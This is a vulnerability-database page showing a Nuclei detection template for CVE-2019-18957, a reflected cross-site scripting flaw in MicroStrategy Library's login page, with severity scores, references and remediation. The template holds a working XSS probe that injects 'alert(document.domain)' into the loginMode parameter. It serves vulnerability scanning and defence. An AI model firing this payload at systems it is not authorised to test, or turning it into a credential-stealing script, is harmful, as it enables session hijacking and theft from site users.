Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-18957
HistoryOct 10, 2022 - 4:34 a.m.

MicroStrategy Library <11.1.3 - Cross-Site Scripting

2022-10-1004:34:13
ProjectDiscovery
github.com
3
microstrategy
library
cross-site scripting
vulnerability
injection
session hijacking
theft of sensitive info
patch
download

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.004 Low

EPSS

Percentile

72.9%

MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
id: CVE-2019-18957

info:
  name: MicroStrategy Library <11.1.3 - Cross-Site Scripting
  author: tess
  severity: medium
  description: |
    MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch.
  reference:
    - https://seclists.org/bugtraq/2019/Nov/23
    - https://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-18957
    - http://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html
    - http://seclists.org/fulldisclosure/2019/Nov/4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-18957
    cwe-id: CWE-79
    epss-score: 0.00375
    epss-percentile: 0.72231
    cpe: cpe:2.3:a:microstrategy:microstrategy_library:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: microstrategy
    product: microstrategy_library
  tags: cve,cve2019,microstrategy,packetstorm,xss,seclists

http:
  - method: GET
    path:
      - "{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "previousLoginMode: alert(document.domain),"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022048cbc684424ad08cac660728cb7c8e3f5215e29ba815fdc4eff0d7eb372e3266022100e2f803accc5ac089bc651bc89b81d8b0c4e1411fdb6cd1adc5ec2e4479667cd8:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.004 Low

EPSS

Percentile

72.9%

Related for NUCLEI:CVE-2019-18957